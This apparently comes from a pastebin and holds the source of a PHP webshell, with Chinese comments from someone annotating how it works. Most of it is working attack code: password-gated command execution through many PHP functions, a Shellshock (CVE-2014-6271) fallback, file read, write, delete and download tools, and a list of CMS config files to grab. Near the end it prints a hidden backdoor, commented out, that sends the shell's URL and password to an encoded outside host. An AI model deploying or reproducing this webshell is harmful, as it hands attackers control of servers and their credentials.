· 6 years ago · Oct 07, 2019, 04:50 PM
1<?php
2//error_reporting(0); //关闭错误提示
3$password='Tr0y';
4date_default_timezone_set('UTC'); //设置默认时区
5ob_start(); //打开缓冲区
6define('myaddress', $_SERVER['SCRIPT_FILENAME']); //定义myaddress为webshell所在的完整路径
7define('postpass', $password); //定义postpass为password
8
9//这个函数依次寻找exec, shell_exec,system, passthru
10//若可以使用则传入要执行的语句(受php.ini的影响
11function Exec_Run($cmd)
12{
13 $res = ''; //执行系统命令后的输出
14 if (function_exists('exec')) { //判断是否有exec
15 @exec($cmd, $res); //利用exec执行命令
16 $res = join("\n", $res); //输出填充到res中
17 } elseif (function_exists('shell_exec')) {
18 $res = @shell_exec($cmd);
19 } elseif (function_exists('system')) {
20 //这里的写法很奇怪
21 //要是为了绕过还不如这样
22 //$cmd = 'sys'.'tem';
23 //ob_start($cmd);
24 //echo "$_GET[a]";
25 //ob_end_flush();
26 @ob_start();
27 @system($cmd);
28 $res = @ob_get_contents();
29 @ob_end_clean();
30 } elseif (function_exists('passthru')) {
31 @ob_start();
32 @passthru($cmd);
33 $res = @ob_get_contents();
34 @ob_end_clean();
35 }
36
37 //函数大意是打开一个进程的管道,给cmd使用
38 //然后用fread()读取,直到feof()
39 //is_resource用于检查一个变量是否是资源
40 //但是如果未找到要执行的命令,会返回一个合法的资源
41 //所以这里是有问题的,无论如何条件都会成立
42 elseif (@is_resource($f = @popen($cmd, 'r'))) {
43 $res = '';
44 while (!@feof($f)) {
45 $res .= @fread($f, 1024);
46 }
47 @pclose($f);
48 }
49
50 //似乎是用于windows的,回头换一下环境试试
51 elseif (substr(dirname($_SERVER["SCRIPT_FILENAME"]), 0, 1) != "/" && class_exists('COM')) {
52 $w = new COM('WScript.shell');
53 $e = $w->exec($cmd);
54 $f = $e->StdOut();
55 $res = $f->ReadAll();
56 }
57
58 //
59 elseif (function_exists('proc_open')) {
60 $length = strcspn($cmd, " \t"); //返回 $cmd 中,所有字符都不存在于 ' \t' 范围的起始子字符串的长度
61 $token = substr($cmd, 0, $length); //截取$length长的$cmd作为$token
62
63 if (isset($aliases[$token])) {
64 $cmd = $aliases[$token] . substr($cmd, $length);
65 } //真正的cmd语句在这
66
67 //proc_open中,0 表示标准输入(stdin),1 表示标准输出(stdout),2 表示标准错误(stderr)
68 //这里用了1和2,比较完善
69 $p = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io);
70 while (!feof($io[1])) {
71 //htmlspecialchars: 将特殊字符转换为 HTML 实体
72 //ENT_QUOTES: 会转换双引号,不转换单引号。
73 $res .= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8');
74 }
75 while (!feof($io[2])) {
76 $res .= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8');
77 }
78 fclose($io[1]);
79 fclose($io[2]);
80 proc_close($p);
81 }
82
83 //bash破壳漏洞(CVE-2014-6271)
84 elseif (function_exists('mail')) {
85 if (strstr(readlink("/bin/sh"), "bash") != false) {
86 $tmp = tempnam(".", "data");
87 putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");
88 mail("a@127.0.0.1", "", "", "", "-bv");
89 } else {
90 $res = "Not vuln (not bash)";
91 }
92
93 //这里顺序有问题,下面这段应该放在上面那个if里
94 $output = @implode('', @file($tmp));
95 @unlink($tmp);
96 if ($output != "") {
97 $res = $output;
98 } else {
99 $res = "No output, or not vuln.";
100 }
101 }
102 return $res;
103}
104
105//webshell里图片的base64储存
106function css_img($img)
107{
108 $images = array(
109 "exe" =>
110 "R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7" .
111 "WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt" .
112 "xhIAOw==",
113 "dir" => "R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAA" .
114 "AAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdE" .
115 "oMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
116 "txt" =>
117 "R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ" .
118 "SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7" .
119 "UpPWG3Ig6Hq/XmRjuZwkAAA7",
120 "html" =>
121 "R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz" .
122 "c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P" .
123 "KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk" .
124 "Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR" .
125 "ADs=",
126 "js" =>
127 "R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH" .
128 "k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs" .
129 "a00AjYYBbc/o9HjNniUAADs=",
130 "xml" =>
131 "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA" .
132 "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
133 "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx" .
134 "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ" .
135 "IQA7",
136 "mp3" =>
137 "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU" .
138 "aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc" .
139 "IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",
140 "img" =>
141 "R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA" .
142 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci" .
143 "Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd" .
144 "FxEAOw==",
145 "title" => "R0lGODlhDgAOAMQAAOGmGmZmZv//xVVVVeW6E+K2F/+ZAHNzcf+vAGdnaf/AAHt1af+" .
146 "mAP/FAP61AHt4aXNza+WnFP//zAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
147 "ACH5BAAHAP8ALAAAAAAOAA4AAAVJYPIcZGk+wUM0bOsWoyu35KzceO3sjsTvDR1P4uMFDw2EEkGUL" .
148 "I8NhpTRnEKnVAkWaugaJN4uN0y+kr2M4CIycwEWg4VpfoCHAAA7",
149 "rar" => "R0lGODlhEAAQAPf/AAAAAAAAgAAA/wCAAAD/AACAgIAAAIAAgP8A/4CAAP//AMDAwP///wAA" .
150 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
151 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
152 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
153 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
154 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
155 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
156 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
157 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
158 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
159 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
160 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
161 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
162 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" .
163 "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/ACH5BAEKAP8ALAAAAAAQABAAAAiFAP0YEEhwoEE/" .
164 "/xIuEJhgQYKDBxP+W2ig4cOCBCcyoHjAQMePHgf6WbDxgAIEKFOmHDmSwciQIDsiXLgwgZ+b" .
165 "OHOSXJiz581/LRcE2LigqNGiLEkKWCCgqVOnM1naDOCHqtWbO336BLpzgAICYMOGRdgywIIC" .
166 "aNOmRcjVj02tPxPCzfkvIAA7"
167 );
168 header('Content-type: image/gif');
169 echo base64_decode($images[$img]);
170 die();
171}
172
173//取文件后缀,返回文件类型
174function css_showimg($file)
175{
176 $it = substr($file, -3);
177 switch ($it) {
178 case "jpg":
179 case "gif":
180 case "bmp":
181 case "png":
182 case "ico":
183 return 'img';
184 break;
185 case "htm":
186 case "tml":
187 return 'html';
188 break;
189 case "exe":
190 case "com":
191 return 'exe';
192 break;
193 case "xml":
194 case "doc":
195 return 'xml';
196 break;
197 case ".js":
198 case "vbs":
199 return 'js';
200 break;
201 case "mp3":
202 case "wma":
203 case "wav":
204 case "swf":
205 case ".rm":
206 case "avi":
207 case "mp4":
208 case "mvb":
209 return 'mp3';
210 break;
211 case "rar":
212 case "tar":
213 case ".gz":
214 case "zip":
215 case "iso":
216 return 'rar';
217 break;
218 default:
219 return 'txt';
220 break;
221 }
222}
223
224//打印html到页面上
225function html_n($data)
226{
227 echo "$data\n";
228}
229
230//木马?Unknown
231function muma($filecode, $filetype)
232{
233 $dim = array(
234 "php" => array("eval(", "exec("),
235 "asp" => array("WScript.Shell", "execute(", "createtextfile("),
236 "aspx" => array("Response.Write(eval(", "RunCMD(", "CreateText()"),
237 "jsp" => array("runtime.exec(")
238 );
239 foreach ($dim[$filetype] as $code) {
240 if (stristr($filecode, $code)) {
241 return true;
242 }
243 }
244}
245
246//判断文件后缀
247function debug($file, $ftype)
248{
249 $type = explode('|', $ftype);
250 foreach ($type as $i) {
251 if (stristr($file, $i)) {
252 return true;
253 }
254 }
255}
256
257//替换路径中的 // 为 /
258function str_path($path)
259{
260 return str_replace('//', '/', $path);
261}
262
263//弹窗
264function msg($msg)
265{
266 die("<script>window.alert('" . $msg . "');history.go(-1);</script>");
267}
268
269//返回路径中的目录部分,替换\\为/,并进行url编码
270function uppath($nowpath)
271{
272 $nowpath = str_replace('\\', '/', dirname($nowpath));
273 return urlencode($nowpath);
274}
275
276//输出带有target的a
277function html_ta($url, $name)
278{
279 html_n("<a href=\"$url\" target=\"_blank\">$name</a>");
280}
281
282//html的a
283function html_a($url, $name, $where = '')
284{
285 html_n("<a href=\"$url\" $where>$name</a> ");
286}
287
288//显示指定的url图片
289function html_img($url)
290{
291 html_n("<img src=\"?img=$url\" border=0>");
292}
293
294//返回
295function back()
296{
297 html_n("<input type='button' value='返回' onclick='history.back();'>");
298}
299
300//html的radio
301function html_radio($namei, $namet, $v1, $v2)
302{
303 html_n('<input type="radio" name="return" value="' . $v1 . '" checked>' . $namei);
304 html_n('<input type="radio" name="return" value="' . $v2 . '">' . $namet . '<br><br>');
305}
306
307//html的input
308function html_input($type, $name, $value = '', $text = '', $size = '', $mode = false)
309{
310 if ($mode) {
311 html_n("<input type=\"$type\" name=\"$name\" value=\"$value\" size=\"$size\" checked>$text");
312 } else {
313 html_n("$text <input type=\"$type\" name=\"$name\" value=\"$value\" size=\"$size\">");
314 }
315}
316
317//html的textarea
318function html_text($name, $cols, $rows, $value = '')
319{
320 html_n("<br><br><textarea name=\"$name\" COLS=\"$cols\" ROWS=\"$rows\" >$value</textarea>");
321}
322
323//html的select
324function html_select($array, $mode = '', $change = '', $name = 'class')
325{
326 html_n("<select name=$name $change>");
327 foreach ($array as $name => $value) {
328 if ($name == $mode) {
329 html_n("<option value=\"$name\" selected>$value</option>");
330 } else {
331 html_n("<option value=\"$name\">$value</option>");
332 }
333 }
334 html_n("</select>");
335}
336
337//html的font
338function html_font($color, $size, $name)
339{
340 html_n("<font color=\"$color\" size=\"$size\">$name</font>");
341}
342
343//替换\\为/,替换//为/
344function File_Str($string)
345{
346 return str_replace('//', '/', str_replace('\\', '/', $string));
347}
348
349//文件写入
350function File_Write($filename, $filecode, $filemode)
351{
352 $key = true;
353 $handle = @fopen($filename, $filemode);
354 if (!@fwrite($handle, $filecode)) {
355 @chmod($filename, 0666);
356 $key = @fwrite($handle, $filecode) ? true : false;
357 }
358 @fclose($handle);
359 return $key;
360}
361
362//返回www根目录
363function File_Mode()
364{
365 $RealPath = realpath('./');
366 $SelfPath = $_SERVER['PHP_SELF'];
367 $SelfPath = substr($SelfPath, 0, strrpos($SelfPath, '/'));
368 return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));
369}
370
371//文件所属用户
372function GetFileOwner($File)
373{
374 if (PATH_SEPARATOR == ':') {
375 if (function_exists('posix_getpwuid')) {
376 $File = posix_getpwuid(fileowner($File));
377 }
378 return $File['name'];
379 }
380}
381
382//文件所属组
383function GetFileGroup($File)
384{
385 if (PATH_SEPARATOR == ':') {
386 if (function_exists('posix_getgrgid')) {
387 $File = posix_getgrgid(filegroup($File));
388 }
389 return $File['name'];
390 }
391}
392
393//文件大小数字处理
394function File_Size($size)
395{
396 $kb = 1024;
397 $mb = 1024 * $kb;
398 $gb = 1024 * $mb;
399 $tb = 1024 * $gb;
400 $db = 1024 * $tb;
401 if ($size < $kb) {
402 return $size . " B";
403 } elseif ($size < $mb) {
404 return round($size / $kb, 2) . " K";
405 } elseif ($size < $gb) {
406 return round($size / $mb, 2) . " M";
407 } elseif ($size < $tb) {
408 return round($size / $gb, 2) . " G";
409 } elseif ($size < $db) {
410 return round($size / $tb, 2) . " T";
411 } else {
412 return round($size / $db, 2) . " ST";
413 }
414}
415
416//读取文件
417function File_Read($filename)
418{
419 $handle = @fopen($filename, "rb");
420 $filecode = @fread($handle, @filesize($filename));
421 @fclose($handle);
422 return $filecode;
423}
424
425//数组编码转换
426function array_iconv($data, $output = 'utf-8')
427{
428 $encode_arr = array('UTF-8', 'ASCII', 'GBK', 'utf8', 'BIG5', 'JIS', 'eucjp-win', 'sjis-win', 'EUC-JP');
429 $encoded = mb_detect_encoding($data, $encode_arr);
430
431 if (!is_array($data)) {
432 return mb_convert_encoding($data, $output, $encoded);
433 } else {
434 foreach ($data as $key => $val) {
435 $key = array_iconv($key, $output);
436 if (is_array($val)) {
437 $data[$key] = array_iconv($val, $output);
438 } else {
439 $data[$key] = mb_convert_encoding($data, $output, $encoded);
440 }
441 }
442 return $data;
443 }
444}
445
446//Unknown
447function Mysql_Len($data, $len)
448{
449 if (strlen($data) < $len) {
450 return $data;
451 }
452 return substr_replace($data, '...', $len);
453}
454
455//一些js,最后那些php unknown
456function css_js($num, $code = '')
457{
458 html_n('<script language="javascript">');
459 if ($num == "1") {
460 $str = <<<end
461function rusurechk(msg,url){
462 smsg = "FileName:[" + msg + "]\\nPlease Input New File:";
463 re = prompt(smsg,msg);
464 if (re){
465 url = url + re;
466 window.location = url;
467 }
468 }
469 function rusuredel(msg,url){
470 smsg = "Do You Suer Delete [" + msg + "] ?";
471 if(confirm(smsg)){
472 URL = url + msg;
473 window.location = url;
474 }
475 }
476 function Delok(msg,gourl)
477 {
478 smsg = "确定要删除[" + unescape(msg) + "]吗?";
479 if(confirm(smsg))
480 {
481 if(gourl == 'b')
482 {
483 document.getElementById('actall').value = escape(gourl);
484 document.getElementById('fileall').submit();
485 }
486 else window.location = gourl;
487 }
488 }
489 function SubmitAttran(msg,ffile,txt,actid)
490 {
491 re = prompt(msg,unescape(txt));
492 if(re)
493 {
494 document.getElementById('attam').value = actid;
495 document.getElementById('file').value = ffile;
496 document.getElementById('inver').value = re;
497 document.getElementById('fileall').submit();
498 }
499 }
500 function CheckAll(form)
501 {
502 for(var i=0;i<form.elements.length;i++)
503 {
504 var e = form.elements[i];
505 if (e.name != 'chkall')
506 e.checked = form.chkall.checked;
507 }
508 }
509 function CheckDate(msg,gourl)
510 {
511 smsg = "当前文件时间:[" + msg + "]";
512 re = prompt(smsg,msg);
513 if(re)
514 {
515 var url = gourl + re;
516 var reg = /^(\d{1,4})(-|\/)(\d{1,2})\\2(\d{1,2}) (\d{1,2}):(\d{1,2}):(\d{1,2})$/;
517 var r = re.match(reg);
518 if(r==null){alert('日期格式不正确!格式:yyyy-mm-dd hh:mm:ss');return false;}
519 else{document.getElementById('actall').value = gourl; document.getElementById('inver').value = re; document.getElementById('fileall').submit();}
520 }
521 }
522 function SubmitUrl(msg,txt,actid)
523 {
524 re = prompt(msg,unescape(txt));
525 if(re)
526 {
527 document.getElementById('actall').value = actid;
528 document.getElementById('inver').value = escape(re);
529 document.getElementById('fileall').submit();
530 }
531 }
532end;
533 html_n($str);
534 } elseif ($num == "2") {
535 $str = <<<end
536var NS4 = (document.layers);
537var IE4 = (document.all);
538var win = this;
539var n = 0;
540function search(str){
541 var txt, i, found;
542 if(str == "")return false;
543 if(NS4){
544 if(!win.find(str)) while(win.find(str, false, true)) n++; else n++;
545 if(n == 0) alert(str + " ... Not-Find")
546 }
547 if(IE4){
548 txt = win.document.body.createTextRange();
549 for(i = 0; i <= n && (found = txt.findText(str)) != false; i++){
550 txt.moveStart("character", 1);
551 txt.moveEnd("textedit")
552 }
553 if(found){txt.moveStart("character", -1);txt.findText(str);txt.select();txt.scrollIntoView();n++}
554 else{if (n > 0){n = 0;search(str)}else alert(str + "... Not-Find")}
555 }
556 return false
557}
558function CheckDate(){
559 var re = document.getElementById('mtime').value;
560 var reg = /^(\d{1,4})(-|\/)(\d{1,2})\\2(\d{1,2}) (\d{1,2}):(\d{1,2}):(\d{1,2})$/;
561 var r = re.match(reg);
562 var t = document.getElementById('charset').value;
563 t = t.toLowerCase();
564 if(r==null){alert('日期格式不正确!格式:yyyy-mm-dd hh:mm:ss');return false;}
565 else{document.getElementById('newfile').value = base64encode(document.getElementById('newfile').value);
566 if(t=="utf-8"){document.getElementById('txt').value = base64encode(utf16to8(document.getElementById('txt').value));}
567end;
568
569 html_n($str);
570 if (substr(PHP_VERSION, 0, 1) >= 5) {
571 $str = <<<end
572if(t=="gbk" || t=="utf8"){document.getElementById('txt').value = base64encode(utf16to8(document.getElementById('txt').value));}
573end;
574 html_n($str);
575 }
576 $str = <<<end
577document.getElementById('editor').submit();}
578}
579end;
580 html_n($str);
581 } elseif ($num == "4") {
582 $str = <<<end
583function Fulll(i){
584 if(i==0){
585 return false;
586 }
587 Str = new Array(10);
588 Str[1] = "config.inc.php";
589 Str[2] = "config.inc.php";
590 Str[3] = "config_base.php";
591 Str[4] = "config.inc.php";
592 Str[5] = "config.php";
593 Str[6] = "wp-config.php";
594 Str[7] = "config.php";
595 Str[8] = "mysql.php";
596 Str[9] = "common.inc.php";
597 Str[10] = "databases.php";
598 sform.code.value = Str[i];
599 return true;
600 }
601end;
602 html_n($str);
603 }
604 html_n("</script>");
605}
606
607//左侧CSS
608function css_left()
609{
610 $str = <<<end
611<style type="text/css">
612 .menu{width:152px;margin-left:auto;margin-right:auto;}
613 .menu dl{margin-top:2px;}
614 .menu dl dt{top left repeat-x;}
615 .menu dl dt a{height:22px;padding-top:1px;line-height:18px;width:152px;display:block;color:#FFFFFF;font-weight:bold;
616 text-decoration:none; 10px 7px no-repeat;text-indent:20px;letter-spacing:2px;}
617 .menu dl dt a:hover{color:#FFFFCC;}
618 .menu dl dd ul{list-style:none;}
619 .menu dl dd ul li a{color:#000000;height:27px;widows:152px;display:block;line-height:27px;text-indent:28px;
620 background:#BBBBBB no-repeat 13px 11px;border-color:#FFF #545454 #545454 #FFF;
621 border-style:solid;border-width:1px;}
622 .menu dl dd ul li a:hover{background:#FFF no-repeat 13px 11px;color:#FF6600;font-weight:bold;}
623 </STYLE>
624end;
625 html_n($str);
626 $str = <<<end
627<script language="javascript">
628 function getObject(objectId){
629 if(document.getElementById && document.getElementById(objectId)) {
630 return document.getElementById(objectId);
631 }
632 else if (document.all && document.all(objectId)) {
633 return document.all(objectId);
634 }
635 else if (document.layers && document.layers[objectId]) {
636 return document.layers[objectId];
637 }
638 else {
639 return false;
640 }
641 }
642 function showHide(objname){
643 var obj = getObject(objname);
644 if(obj.style.display == "none"){
645 obj.style.display = "block";
646 }else{
647 obj.style.display = "none";
648 }
649 }
650 </script><div class="menu">
651end;
652 html_n($str);
653}
654
655//输出预定的CSS 样式
656function css_main()
657{
658 $str = <<<end
659<style type="text/css">
660 *{padding:0px;margin:0px;}
661 body,td{font-size: 12px;color:#00ff00;background:#292929;}input,select,textarea{font-size: 12px;background-color:#FFFFCC;border:1px solid #fff}
662 body{color:#FFFFFF;font-family:Verdana, Arial, Helvetica, sans-serif;
663 height:100%;overflow-y:auto;background:#333333;SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;SCROLLBAR-TRACK-COLOR: #383838;}
664 input,select,textarea{background-color:#FFFFCC;border:1px solid #FFFFFF}
665 a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}
666 .actall{background:#000000;font-size:14px;border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both;}
667 </STYLE><body style="table-layout:fixed; word-break:break-all; FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)">
668 <table width="85%" border=0 bgcolor="#555555" align="center">
669end;
670 html_n($str);
671}
672
673//css footer
674function css_foot()
675{
676 html_n("</td></tr></table>");
677}
678
679//写入到文件
680function do_write($file, $t, $text)
681{
682 $key = true;
683 $handle = @fopen($file, $t);
684 if ($text != "") {
685 if (!@fwrite($handle, $text)) {
686 @chmod($file, 0666);
687 $key = @fwrite($handle, $text) ? true : false;
688 }
689 }
690 @fclose($handle);
691 return $key;
692}
693
694set_error_handler("warning_handler", E_WARNING);
695function warning_handler()
696{
697 $_GET['warning'] = 1;
698}
699
700//获取一个路径下的文件与文件夹
701function do_show($filepath)
702{
703 $_GET['warning'] = 0;
704 $show = array();
705 $dir = dir($filepath);
706 if ($_GET['warning']) {
707 return 1;
708 }
709 while ($file = $dir->read()) {
710 if ($file == '.' or $file == '..') {
711 continue;
712 }
713 $files = str_path($filepath . '/' . $file);
714 $show[] = $files;
715 }
716 $dir->close();
717 return $show;
718}
719
720//删除一个文件夹
721function delDirAndFile($path)
722{
723 if (is_dir($path)) {
724 $file_list = scandir($path);
725 foreach ($file_list as $file) {
726 if ($file != '.' && $file != '..') {
727 delDirAndFile($path . '/' . $file);//递归删除
728 }
729 }
730 @rmdir($path);//删除空目录
731 } elseif (is_file($path)) {
732 @chmod($path, 0777);
733 @unlink($path);//删除文件
734 }
735}
736
737//请求一个url并返回响应内容
738function GetHtml($url)
739{
740 $c = '';
741 $useragent = 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)';
742 if (function_exists('fsockopen')) {
743 $link = parse_url($url);
744 $query = $link['path'] . '?' . $link['query'];
745 $host = strtolower($link['host']);
746 $port = $link['port'];
747 if ($port == "") {
748 $port = 80;
749 }
750 $fp = fsockopen($host, $port, $errno, $errstr, 10);
751 if ($fp) {
752 $out = "GET /{$query} HTTP/1.0\r\n";
753 $out .= "Host: {$host}\r\n";
754 $out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\r\n";
755 $out .= "Connection: Close\r\n\r\n";
756 fwrite($fp, $out);
757 $inheader = 1;
758 $contents = "";
759 while (!feof($fp)) {
760 $line = fgets($fp, 4096);
761 if ($inheader == 0) {
762 $contents .= $line;
763 }
764 if ($inheader && ($line == "\n" || $line == "\r\n")) {
765 $inheader = 0;
766 }
767 }
768 fclose($fp);
769 $c = $contents;
770 }
771 }
772
773 if (empty($c) && function_exists('curl_init') && function_exists('curl_exec')) {
774 $ch = curl_init();
775 curl_setopt($ch, CURLOPT_URL, $url);
776 curl_setopt($ch, CURLOPT_TIMEOUT, 15);
777 curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
778 curl_setopt($ch, CURLOPT_USERAGENT, $useragent);
779 $c = curl_exec($ch);
780 curl_close($ch);
781 }
782 if (empty($c) && ini_get('allow_url_fopen')) {
783 $c = implode('', @file($url));
784 if (empty($c)) {
785 $c = file_get_contents($url);
786 }
787 }
788 if (empty($c)) {
789 echo "document.writeln(\"<DIV style=\'CURSOR:url(\'$url\')\'>\");";
790 }
791 if (!empty($c)) {
792 return $c;
793 }
794}
795
796function do_showsql($query, $conn)
797{
798 $result = @mysql_query($query, $conn);
799 html_n('<br><br><textarea cols="70" rows="15">');
800 while ($row = @mysql_fetch_array($result)) {
801 for ($i = 0; $i < @mysql_num_fields($result); $i++) {
802 html_n(htmlspecialchars($row[$i]));
803 }
804 }
805 html_n('</textarea>');
806}
807
808//若不为内网ip则发送webshell信息
809function hmlogin()
810{
811 $domain = $_SERVER ['HTTP_HOST'];
812 if (strpos($domain, "0.0") !== false || strpos($domain, "192.168.") !== false || strpos($domain, "localhost") !== false) {
813 echo "<meta http-equiv='refresh' content='0'>";
814 } else {
815 show_main();
816 }
817}
818
819
820//下载文件 Unknown
821function do_down($fd)
822{
823 if (!@file_exists($fd)) {
824 msg("下载文件不存在");
825 }
826 $fileinfo = pathinfo($fd);
827 header("Content-type: application/x-" . $fileinfo['extension']);
828 header("Content-Disposition: attachment; filename=" . $fileinfo['basename']);
829 header("Content-Length: " . filesize($fd));
830 @readfile($fd);
831 exit;
832}
833
834//下载文件 Unknown
835function do_download($filecode, $file)
836{
837 header("Content-type: application/unknown");
838 header("Accept-Ranges: bytes");
839 header("Content-length: " . strlen($filecode));
840 header("Content-Disposition: attachment; filename=" . $file . ";");
841 echo $filecode;
842 exit;
843}
844
845//测试是否为utf8
846function TestUtf8($text)
847{
848 if (strlen($text) < 3) {
849 return false;
850 }
851 $lastch = 0;
852 $begin = 0;
853 $BOM = true;
854 $BOMchs = array(0xEF, 0xBB, 0xBF);
855 $good = 0;
856 $bad = 0;
857 $notAscii = 0;
858 for ($i = 0; $i < strlen($text); $i++) {
859 $ch = ord($text[$i]);
860 if ($begin < 3) {
861 $BOM = ($BOMchs[$begin] == $ch);
862 $begin += 1;
863 continue;
864 }
865 if ($begin == 4 && $BOM) {
866 break;
867 }
868 if ($ch >= 0x80) {
869 $notAscii++;
870 }
871 if (($ch & 0xC0) == 0x80) {
872 if (($lastch & 0xC0) == 0xC0) {
873 $good += 1;
874 } elseif (($lastch & 0x80) == 0) {
875 $bad += 1;
876 }
877 } elseif (($lastch & 0xC0) == 0xC0) {
878 $bad += 1;
879 }
880 $lastch = $ch;
881 }
882 if ($begin == 4 && $BOM) {
883 return 2;
884 } elseif ($notAscii == 0) {
885 return 1;
886 } elseif ($good >= $bad) {
887 return 2;
888 } else {
889 return 0;
890 }
891}
892
893//获取并处理cfg信息
894function Info_Cfg($varname)
895{
896 switch ($result = get_cfg_var($varname)) {
897 case 0:
898 return "No";
899 break;
900 case 1:
901 return "Yes";
902 break;
903 default:
904 return $result;
905 break;
906 }
907}
908
909//检查函数存在与否
910function Info_Fun($funName)
911{
912 return (false !== function_exists($funName)) ? "Yes" : "No";
913}
914
915//后门No.2
916/*function show_main()
917{
918 @set_time_limit(10);
919 $apiname = urlencode($_SERVER ['HTTP_HOST'] . $_SERVER['SCRIPT_NAME']);
920 $apivalue = urlencode(postpass);
921 $apitoken = base64_decode(base64_decode("YUhSMGNEb3ZMM0JvY0dGd2FTNXBibVp2TDJGd2FTNXdhSEEvYm1GdFpUMD0="));
922 $apikey = "&id=" . urlencode(get_proxy_ip());
